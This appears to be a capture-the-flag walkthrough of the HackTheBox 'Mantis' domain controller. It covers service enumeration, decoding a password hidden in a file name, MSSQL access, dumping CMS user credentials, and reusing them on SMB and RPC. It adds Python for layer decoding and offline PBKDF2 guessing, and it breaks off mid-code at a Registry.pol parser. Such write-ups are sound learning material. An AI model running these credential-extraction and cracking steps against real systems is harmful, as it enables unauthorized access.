nmap scan
└─$ nmap -sV -sC -oA mantis 10.10.10.52 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 22:55 EDT
Nmap scan report for 10.10.10.52
Host is up (0.34s latency).
Not shown: 981 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-18 02:56:30Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-info:
| 10.10.10.52:1433:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.10.10.52:1433:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
|_ssl-date: 2023-09-18T02:57:46+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-09-18T02:43:16
|_Not valid after: 2053-09-18T02:43:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-IIS/7.5
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Tossed Salad – Blog
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_clock-skew: mean: 48m00s, deviation: 1h47m21s, median: 0s
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
| System time: 2023-09-17T22:57:31-04:00
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-09-18T02:57:32
|_ start_date: 2023-09-18T02:43:09
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.80 seconds
Adding the domain and the DC's FQDN (both taken from the nmap LDAP/SMB output) to the hosts file, /etc/hosts:
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.175 EGOTISTICAL-BANK.LOCAL
10.10.10.100 active.htb htb
10.10.10.192 blackfield.local
10.10.10.182 cascade.local
10.10.11.152 timelapse.htb
10.10.10.169 megabank.local resolute.megabank.local
10.10.10.52 htb.local mantis.htb.local
ldapsearch
naming context
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ ldapsearch -x -H ldap://10.10.10.52 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
Searching for valid usernames: no luck. The rootDSE is readable anonymously, but a subtree search needs a bind, so anonymous user enumeration over LDAP is out on this DC.
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ ldapsearch -x -H ldap://10.10.10.52 -b 'DC=htb,DC=local' -s sub
# extended LDIF
#
# LDAPv3
# base <DC=htb,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C09075A, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v1db1

# numResponses: 1
smbclient, but no luck (anonymous login is accepted but no shares are listed):
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ smbclient -L //10.10.10.52
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.52 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ smbclient -L //10.10.10.52 -N -U%
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.52 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ smbmap -H 10.10.10.52
Try rpcclient with two options:
rpcclient -U '' 10.10.10.52      --> blank username, prompts for a password
rpcclient -U '' -N 10.10.10.52   --> blank username, no password prompt (null session)

┌──(kali㉿kali)-[~/HTB/mantis]
└─$ rpcclient -U '' 10.10.10.52
Password for [WORKGROUP\]:
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

┌──(kali㉿kali)-[~/HTB/mantis]
└─$ rpcclient -U '' -N 10.10.10.52
rpcclient $>
Will try some rpcclient commands - no permissions:
result was NT_STATUS_ACCESS_DENIED
rpcclient $> querydispinfo
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED
GetNPUsers (AS-REP roasting without a user list). Note the -dc-ip as typed is 10.10.10.192, not this box's 10.10.10.52, and no output was captured:
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py -dc-ip 10.10.10.192 -request 'htb.local/'
Password policy
┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 10.10.10.52 --pass-pol
SMB   10.10.10.52   445   MANTIS   [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True)
Only the banner came back; without credentials the policy query is refused, consistent with the ACCESS_DENIED from the null-session rpcclient above.
Tried mssqlclient.py with Windows authentication. -windows-auth sends NTLM, and without a valid domain account (or with the wrong domain) SQL Server rejects it with the "untrusted domain" error below; a SQL login (no -windows-auth) is what works later once credentials turn up.
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./mssqlclient.py [email protected] -windows-auth
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Encryption required, switching to TLS
[-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.
Tried enumerating 10.10.10.52:8080 with gobuster but did not get anything after trying each endpoint:
gobuster dir -u http://10.10.10.52:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Out of the rabbit hole
Tried to do a full nmap scan but it kept failing before completion:
nmap -p- -T4 -oA full 10.10.10.52 -Pn
Got a hint that port 1337 is open, so just did a direct scan of that port:
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ nmap -p 1337 10.10.10.52
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-21 18:09 EDT
Nmap scan report for htb.local (10.10.10.52)
Host is up (0.34s latency).

PORT     STATE SERVICE
1337/tcp open  waste

Nmap done: 1 IP address (1 host up) scanned in 0.74 seconds
We can open a web page at http://10.10.10.52:1337/
Enumerating this with gobuster:
gobuster dir -u http://10.10.10.52:1337/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
I also ran the same with ffuf to see if it gets anything faster:
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.52:1337/FUZZ
ffuf is definitely much faster and gave me a result much quicker. Will be using it.
└─$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.52:1337/FUZZ

        v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.52:1337/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 339ms]
    * FUZZ: # Copyright 2007 James Fisher
[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 341ms]
    * FUZZ: # or send a letter to Creative Commons, 171 Second Street,
[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 341ms]
    * FUZZ: # on atleast 2 different hosts
[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 341ms]
    * FUZZ: #
[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 341ms]
    * FUZZ: 
[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 341ms]
    * FUZZ: # This work is licensed under the Creative Commons
[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 344ms]
    * FUZZ: #
[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 344ms]
    * FUZZ: # license, visit http://creativecommons.org/licenses/by-sa/3.0/
[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 345ms]
    * FUZZ: # Priority ordered case sensative list, where entries were found
[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 345ms]
    * FUZZ: # Attribution-Share Alike 3.0 License. To view a copy of this
[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 346ms]
    * FUZZ: # Suite 300, San Francisco, California, 94105, USA.
[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 346ms]
    * FUZZ: #
[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 346ms]
    * FUZZ: # directory-list-2.3-medium.txt
[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 346ms]
    * FUZZ: #
[Status: 500, Size: 3026, Words: 683, Lines: 73, Duration: 617ms]
    * FUZZ: orchard
[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 340ms]
    * FUZZ: 
[Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 347ms]
    * FUZZ: secure_notes

Every comment line at the top of the wordlist (and the empty line) gets the same 200 / 689-byte response, i.e. the server's default page, so on a real run filter those out with -fs 689 or let ffuf auto-calibrate with -ac. The two hits that matter are /orchard (500) and /secure_notes (301).
Found this file:
http://10.10.10.52:1337/secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt
1. Download OrchardCMS
2. Download SQL server 2014 Express, create user "admin", and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure SQL server connection string.
6. Add blog pages with admin user.
From ChatGPT:
The string "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx" appears to be encoded in Base64 format. Base64 is a group of binary-to-text encoding schemes that represent binary data in an ASCII string format. To determine its original content, you would need to decode it from Base64.
Decoding it gives a hex string, and converting the hex to ASCII gives the password. Note the two dollar signs: the hex starts 6d 24 24, which is "m$$", so the password is m$$ql_S@_P@ssW0rd! (18 characters).
┌──(kali㉿kali)-[~/Downloads]
└─$ echo "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx" | base64 -d
6d2424716c5f53405f504073735730726421
┌──(kali㉿kali)-[~/Downloads]
└─$ echo "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx" | base64 -d | xxd -r -p
m$$ql_S@_P@ssW0rd!
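The same decode chain (base64, then hex, then ASCII) as a small generic layer-peeler. This is an added example, not part of the original notes: it guesses each layer from the character alphabet and stops when the result is readable text or no longer looks like an encoding. The heuristics are mine; the only input taken from the page is the token from the file name.

```python
import base64
import binascii
import re
import string

# Alphabet checks used to guess what a layer is. Hex is tested first because
# every hex string is also valid base64 and the narrower match should win.
_HEX_RE = re.compile(r'^[0-9a-fA-F]+$')
_B64_RE = re.compile(r'^[A-Za-z0-9+/]+={0,2}$')
_PRINTABLE = set(string.printable.encode('ascii'))


def _is_printable(data: bytes) -> bool:
    """True when every byte is printable ASCII or whitespace."""
    return bool(data) and all(b in _PRINTABLE for b in data)


def _decode_once(text: str):
    """Decode one layer; returns (layer_name, decoded_text) or None if it is not an encoding."""
    if _HEX_RE.match(text) and len(text) % 2 == 0:
        raw, layer = binascii.unhexlify(text), 'hex'
    elif _B64_RE.match(text) and len(text) % 4 == 0:
        try:
            raw, layer = base64.b64decode(text, validate=True), 'base64'
        except binascii.Error:
            return None
    else:
        return None
    # A layer that yields non-text is a false positive (or binary we cannot peel further).
    if not _is_printable(raw):
        return None
    return layer, raw.decode('ascii')


def peel(token: str, max_layers: int = 8) -> list:
    """Strip nested hex/base64 layers from token.

    Returns the chain of (layer, text) pairs starting with ('raw', token);
    the last element is the recovered plaintext (or the input, if nothing decoded).
    """
    chain = [('raw', token)]
    current = token.strip()
    for _ in range(max_layers):
        step = _decode_once(current)
        if step is None:
            break
        current = step[1]
        chain.append(step)
    return chain


if __name__ == '__main__':
    # The token from the dev_notes file name above.
    for layer, text in peel('NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx'):
        print('%-7s %s' % (layer, text))
```

Because the hex check runs before the base64 check, a token that happens to be all hex digits but was actually base64 would be mis-read; for a file name like the one above that is the right trade-off, and the chain output makes it obvious when a layer decoded to something unexpected.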
We are going to try and connect to the SQL database with the admin credentials using mssqlclient.py (a SQL login this time, so no -windows-auth; the password has two dollar signs, as decoded above):
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./mssqlclient.py admin:'m$$ql_S@_P@ssW0rd!'@10.10.10.52
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208)
[!] Press help for extra shell commands
SQL (admin admin@master)>
Some commands to interact with the SQL server:
To list all databases:
SELECT name FROM sys.databases;
To switch to a specific database (replace YourDatabaseName with the actual database name):
USE YourDatabaseName;
Once inside a specific database, to list all tables:
SELECT name FROM sys.tables;
To see the columns of a specific table (replace YourTableName with the actual table name):
SELECT column_name, data_type, character_maximum_length FROM information_schema.columns WHERE table_name = 'YourTableName';
Looking for usernames (server-level logins first):
SQL (admin admin@master)> USE master;
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
SQL (admin admin@master)> SELECT name, type_desc FROM sys.server_principals WHERE type IN ('U', 'G', 'S');
name    type_desc
-----   ---------
sa      SQL_LOGIN
admin   SQL_LOGIN
Recommendation from ChatGPT:
User and Role Information: blog_Orchard_Users_UserPartRecord might contain user-specific information.
To fetch all columns from this table (after switching to the orcharddb database, as the prompt shows):
SELECT * FROM blog_Orchard_Users_UserPartRecord;
[-] ERROR(MANTIS\SQLEXPRESS): Line 1: Incorrect syntax near the keyword 'WHERE'.   (error from a previous query)
SQL (admin admin@orcharddb)> SELECT * FROM blog_Orchard_Users_UserPartRecord;
Columns: Id, UserName, Email, NormalizedUserName, Password, PasswordFormat, HashAlgorithm, PasswordSalt, RegistrationStatus, EmailStatus, EmailChallengeToken, CreatedUtc, LastLoginUtc, LastLogoutUtc

Row Id 2:
  UserName admin; Email / NormalizedUserName admin (one of the two is blank in the dump)
  Password AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A==
  PasswordFormat Hashed; HashAlgorithm PBKDF2; PasswordSalt UBwWF1CQCsaGc/P7jIR/kg==
  RegistrationStatus Approved; EmailStatus Approved; EmailChallengeToken NULL
  CreatedUtc 2017-09-01 13:44:01; LastLoginUtc 2017-09-01 14:03:50; LastLogoutUtc 2017-09-01 14:06:31

Row Id 15:
  UserName James; Email [email protected]; NormalizedUserName james
  Password J@m3s_P@ssW0rd!
  PasswordFormat Plaintext; HashAlgorithm Plaintext; PasswordSalt NA
  RegistrationStatus Approved; EmailStatus Approved; EmailChallengeToken NULL
  CreatedUtc 2017-09-01 13:45:44; LastLoginUtc NULL; LastLogoutUtc NULL
We can see user james with the password J@m3s_P@ssW0rd! stored in plaintext, while admin's password is only a salted PBKDF2 hash and would have to be cracked offline.
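The admin row is stored as PasswordFormat Hashed / HashAlgorithm PBKDF2, which is why only james's row was directly usable. The block below is an added example, not from the original notes and not Orchard's code: it parses and verifies the System.Web.Helpers.Crypto.HashPassword() layout from ASP.NET (a 0x00 marker byte, a 16-byte salt, then a 32-byte PBKDF2-HMAC-SHA1 subkey at 1000 iterations), which is exactly the 49-byte shape the admin blob decodes to, and runs a small offline guess loop against a hash it builds itself. Whether Orchard feeds the raw password into this routine or first prepends its separate PasswordSalt column is not checked here; that is an assumption to confirm against Orchard's MembershipService source before pointing a cracker at the real admin hash. The demo password and candidate list are constructed.

```python
import base64
import hashlib
import hmac
import os

# Layout produced by System.Web.Helpers.Crypto.HashPassword() (ASP.NET):
#   byte 0        : format marker, always 0x00
#   bytes 1..16   : 128-bit random salt
#   bytes 17..48  : 256-bit PBKDF2-HMAC-SHA1 subkey, 1000 iterations
# 49 bytes in total, stored base64-encoded. The admin row above decodes to
# exactly this size with a leading 0x00, which is what identifies the format.
SALT_LEN = 16
SUBKEY_LEN = 32
ITERATIONS = 1000

# Hash copied from the orcharddb dump above; only its structure is inspected here.
ADMIN_HASH = 'AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A=='


def parse_hashed_password(b64: str) -> dict:
    """Split a Crypto.HashPassword() blob into its salt and subkey."""
    raw = base64.b64decode(b64)
    if len(raw) != 1 + SALT_LEN + SUBKEY_LEN or raw[0] != 0x00:
        raise ValueError('not a Crypto.HashPassword() blob')
    return {'salt': raw[1:1 + SALT_LEN], 'subkey': raw[1 + SALT_LEN:]}


def _derive(password: str, salt: bytes) -> bytes:
    # Rfc2898DeriveBytes(string, salt, iterations) UTF-8 encodes the password.
    return hashlib.pbkdf2_hmac('sha1', password.encode('utf-8'), salt, ITERATIONS, SUBKEY_LEN)


def hash_password(password: str, salt: bytes = None) -> str:
    """Produce a blob in the same layout (random salt unless one is supplied)."""
    salt = salt if salt is not None else os.urandom(SALT_LEN)
    return base64.b64encode(b'\x00' + salt + _derive(password, salt)).decode('ascii')


def verify_password(b64: str, password: str) -> bool:
    """Recompute the subkey with the stored salt and compare in constant time."""
    parts = parse_hashed_password(b64)
    return hmac.compare_digest(_derive(password, parts['salt']), parts['subkey'])


def crack(b64: str, candidates):
    """Offline guess loop; returns the first candidate that verifies, else None."""
    for guess in candidates:
        if verify_password(b64, guess):
            return guess
    return None


if __name__ == '__main__':
    parts = parse_hashed_password(ADMIN_HASH)
    print('admin salt   :', parts['salt'].hex())
    print('admin subkey :', parts['subkey'].hex())
    # Constructed demo: a hash built here with a made-up password, not the real admin one.
    demo = hash_password('Winter2017!')
    print('demo match   :', crack(demo, ['password', 'Winter2017!', 'admin']))
```

At 1000 iterations of HMAC-SHA1 this format is cheap to brute-force offline, so a weak admin password here would fall quickly; the point of the example is that the stored salt is recoverable from the blob itself, and that the plaintext james row made none of this necessary.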
Trying crackmapexec with this. The CMS password is also james's domain password (password reuse); the login line has no "(Pwn3d!)", so james is not a local admin on the DC:
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ crackmapexec smb 10.10.10.52 -u 'james' -p 'J@m3s_P@ssW0rd!'
SMB   10.10.10.52   445   MANTIS   [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True)
SMB   10.10.10.52   445   MANTIS   [+] htb.local\james:J@m3s_P@ssW0rd!
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ crackmapexec smb 10.10.10.52 -u 'james' -p 'J@m3s_P@ssW0rd!' --shares
SMB   10.10.10.52   445   MANTIS   [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True)
SMB   10.10.10.52   445   MANTIS   [+] htb.local\james:J@m3s_P@ssW0rd!
SMB   10.10.10.52   445   MANTIS   [+] Enumerated shares
SMB   10.10.10.52   445   MANTIS   Share       Permissions   Remark
SMB   10.10.10.52   445   MANTIS   -----       -----------   ------
SMB   10.10.10.52   445   MANTIS   ADMIN$                    Remote Admin
SMB   10.10.10.52   445   MANTIS   C$                        Default share
SMB   10.10.10.52   445   MANTIS   IPC$                      Remote IPC
SMB   10.10.10.52   445   MANTIS   NETLOGON    READ          Logon server share
SMB   10.10.10.52   445   MANTIS   SYSVOL      READ          Logon server share
Trying WinRM, but this fails: nothing is listening on 5985 (it was not in the nmap results either). Note the evil-winrm attempt used -u ryan rather than james; it would not have mattered, since the connection itself is refused.
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ crackmapexec winrm 10.10.10.52 -u 'james' -p 'J@m3s_P@ssW0rd!'
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ evil-winrm -i 10.10.10.52 -u ryan -p 'J@m3s_P@ssW0rd!'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

Error: An error of type Errno::ECONNREFUSED happened, message is Connection refused - Connection refused - connect(2) for "10.10.10.52" port 5985 (10.10.10.52:5985)

Error: Exiting with code 1
Trying rpcclient with james's credentials (the same commands that were denied over the null session now work):
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ rpcclient -U james 10.10.10.52
Password for [WORKGROUP\james]:
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[james] rid:[0x44f]
rpcclient $> querydispinfo
index: 0xdea RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xdeb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xea6 RID: 0x44f acb: 0x00000210 Account: james Name: James Desc: (null)
index: 0xe19 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[DnsUpdateProxy] rid:[0x44e]
rpcclient $> queryuser james
User Name : james
Full Name : James
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description :
Workstations:
Comment :
Remote Dial :
Logon Time : Sun, 24 Dec 2017 09:39:48 EST
Logoff Time : Wed, 31 Dec 1969 19:00:00 EST
Kickoff Time : Wed, 13 Sep 30828 22:48:05 EDT
Password last set Time : Thu, 31 Aug 2017 20:12:02 EDT
Password can change Time : Fri, 01 Sep 2017 20:12:02 EDT
Password must change Time: Wed, 13 Sep 30828 22:48:05 EDT
unknown_2[0..31]...
user_rid : 0x44f
group_rid: 0x201
acb_info : 0x00000210
fields_present: 0x00ffffff
Getting the SID for james (the RID is the last component, 1103 = 0x44f as shown by enumdomusers; "(User: 1)" is the SID type, not the RID):
rpcclient $> lookupnames james
james S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1)
Checking NETLOGON and SYSVOL. There was nothing in NETLOGON.
└─$ smbclient \\\\10.10.10.52\\SYSVOL -U james%J@m3s_P@ssW0rd!
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Aug 31 20:05:10 2017
  ..                                  D        0  Thu Aug 31 20:05:10 2017
  htb.local                          Dr        0  Thu Aug 31 20:05:10 2017

		5217023 blocks of size 4096. 938803 blocks available
smb: \> cd htb.local
smb: \htb.local\> ls
  .                                   D        0  Thu Aug 31 20:06:29 2017
  ..                                  D        0  Thu Aug 31 20:06:29 2017
  DfsrPrivate                      DHSr        0  Thu Aug 31 20:06:29 2017
  Policies                            D        0  Thu Aug 31 20:05:19 2017
  scripts                             D        0  Thu Aug 31 20:05:10 2017

		5217023 blocks of size 4096. 938803 blocks available
smb: \htb.local\> cd scripts
smb: \htb.local\scripts\> ls
  .                                   D        0  Thu Aug 31 20:05:10 2017
  ..                                  D        0  Thu Aug 31 20:05:10 2017

		5217023 blocks of size 4096. 938803 blocks available
smb: \htb.local\scripts\> cd ../
smb: \htb.local\> cd DfsrPrivate
cd \htb.local\DfsrPrivate\: NT_STATUS_ACCESS_DENIED
smb: \htb.local\> cd Policies
smb: \htb.local\Policies\> ls
  .                                   D        0  Thu Aug 31 20:05:19 2017
  ..                                  D        0  Thu Aug 31 20:05:19 2017
  {31B2F340-016D-11D2-945F-00C04FB984F9}      D        0  Thu Aug 31 20:05:19 2017
  {6AC1786C-016F-11D2-945F-00C04fB984F9}      D        0  Thu Aug 31 20:05:19 2017

		5217023 blocks of size 4096. 938803 blocks available

The two GUIDs are the built-in GPOs: {31B2F340-...} is the Default Domain Policy and {6AC1786C-...} the Default Domain Controllers Policy. Downloaded the Registry.pol file from the first one locally:
smb: \htb.local\Policies\> cd {31B2F340-016D-11D2-945F-00C04FB984F9}
smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> ls
  .                                   D        0  Thu Aug 31 20:05:19 2017
  ..                                  D        0  Thu Aug 31 20:05:19 2017
  GPT.INI                             A       22  Thu Aug 31 20:08:27 2017
  MACHINE                             D        0  Thu Aug 31 20:08:27 2017
  USER                                D        0  Thu Aug 31 20:05:19 2017

		5217023 blocks of size 4096. 939173 blocks available
smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> cd USER
smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\> ls
  .                                   D        0  Thu Aug 31 20:05:19 2017
  ..                                  D        0  Thu Aug 31 20:05:19 2017

		5217023 blocks of size 4096. 939173 blocks available
smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\> cd MACHINE
cd \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\MACHINE\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\> cd ../
smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> cd MACHINE
smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> ls
  .                                   D        0  Thu Aug 31 20:08:27 2017
  ..                                  D        0  Thu Aug 31 20:08:27 2017
  Microsoft                           D        0  Thu Aug 31 20:05:19 2017
  Registry.pol                        A     2782  Thu Aug 31 20:08:27 2017

		5217023 blocks of size 4096. 939173 blocks available
smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> get Registry.pol
getting file \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2782 as Registry.pol (1.9 KiloBytes/sec) (average 1.9 KiloBytes/sec)
Used polenum to analyse it. Gave up; rabbit hole. Looked for hints. (polenum queries the domain password policy over SAMR; it does not read Registry.pol. That file is the machine-side registry settings of the Default Domain Policy, a binary file with a "PReg" header, so strings or a small parser is the right tool for it.)
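A parser for that Registry.pol format, added here as an example and not taken from the page or from any tool. The file is a "PReg" signature, a 4-byte version (1), then records of the form [key;value;type;size;data], where the brackets and semicolons are UTF-16LE characters, key and value are NUL-terminated UTF-16LE strings, type and size are little-endian DWORDs, and data is size bytes. The block walks those records, decodes REG_DWORD, REG_SZ and REG_MULTI_SZ data, and runs against a sample it constructs itself (the three settings in it are made up, not the real file's contents); pass a path to dump a downloaded file.

```python
import struct
import sys

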